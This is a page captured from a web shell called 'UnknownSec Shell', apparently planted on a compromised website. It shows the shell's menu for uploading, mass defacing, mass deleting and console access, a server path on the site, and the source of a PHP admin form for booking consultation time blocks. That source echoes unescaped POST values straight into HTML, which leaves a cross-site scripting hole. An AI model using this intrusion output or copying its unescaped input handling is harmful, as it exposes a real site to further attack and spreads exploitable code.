shell bypass 403
UnknownSec Shell
:
/
home
/
delvin
/
public_html
/
dev2.delv-in.com
/
views
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
v_admin_consSched_edit.php
<?php if ($_POST['submitBut'] == 'Edit'){ $Consult_Schedule = new Consult_Schedule; $row = $Consult_Schedule->get($_POST['conSchedID'], '', ''); $conSchedID = $_POST['conSchedID']; $startTS = $row['startTS']; $endTS = $row['endTS']; $month = date('n', $startTS); $date = date('j', $startTS); $year = date('Y', $startTS); $hour = date('g', $startTS); $min = date('i', $startTS); $ampm = date('A', $startTS); $duration = ($endTS - $startTS) / 60; $action = 'Edit'; } else if ($_POST['submitBut'] == 'Save'){ // return data from form $conSchedID = $_POST['conSchedID']; $startTS = $_POST['startTS']; $endTS = $_POST['endTS']; $month = $_POST['month']; $date = $_POST['date']; $year = $_POST['year']; $hour = $_POST['hour']; $min = $_POST['min']; $ampm = $_POST['ampm']; $duration = $_POST['duration']; $action = $_POST['action']; if (!checkdate($_POST['month'], $_POST['date'],$_POST['year']) || $_POST['hour'] == '' || $_POST['min'] == '' || $_POST['ampm'] == '' || $_POST['duration'] == ''){ } } else { // initialize variables $conSchedID = ''; $startTS = ''; $month = date('n', $_POST['dateTS']); $date = $_POST['day']; $year = date('Y', $_POST['dateTS']); $endTS = ''; $action = 'Add'; } echo " <div class='col-12 input_form'> <H1>". $action . " a Time Block for a Consultation</H1> <p> Visitors to the web site will be able book a free consultation in any available time block. <br>Times are in Pacific Standard Time. </p> <div class='edit_form_group'> <form action='' method='post' name='edit'> <input type='hidden' name='conSchedID' value='".$conSchedID."'> <input type='hidden' name='action' value='".$action."'> <input type='hidden' name='dateTS' value='". $_POST['dateTS'] ."'> <input type='hidden' name='t' value='". $_POST['t'] ."'> <input type='hidden' name='day' value='". $_POST['day'] ."'> <div class='form_full_width right'> <input type='submit' name='submitBut' value='Save' class='btn btn_save'> <input type='submit' name='submitBut' value='Cancel' class='btn btn_cancel'> </div>"; if ($conSchedID > 0){ echo " <div class='form_label'>ID#: </div> <div class='form_input'>".$conSchedID."</div> "; } echo " <div class='col-12 bot_line'> <div class='form_label'>Date:</div> <div class='form_input'>"; $Select_month = new Select_month('month', 'F', $month, "[month]", '', 'edit'); echo " "; $Select_date = new Select_date('date', $date, "[date]", '', 'edit'); echo " "; $Select_year = new Select_year('year', date('Y'), date('Y') + 1, $year, "[year]", '', 'edit'); echo " </div> </div> <div class='col-12 bot_line'> <div class='form_label'>Time: </div> <div class='form_input'> "; $Select_hours = new Select_hours('hour', 'g', $hour, "[hour]", '', 'edit', ''); echo " : "; $Select_minutes = new Select_minutes('min', '15', $min, "[min]", '', 'edit', ''); echo " "; $Select_AMPM = new Select_AMPM('ampm', $ampm, '[am/pm]', '', 'edit', ''); echo " </div> </div> <div class='col-12 bot_line'> <div class='form_label'>Duration: </div> <div class='form_input'>"; $SelectObjNum = new SelectObjNum('duration', '30', '75', 15, $duration, '', "[minutes]", '', 'edit', ''); echo " minutes </div> </div> </form> </div> ";
© 2026 UnknownSec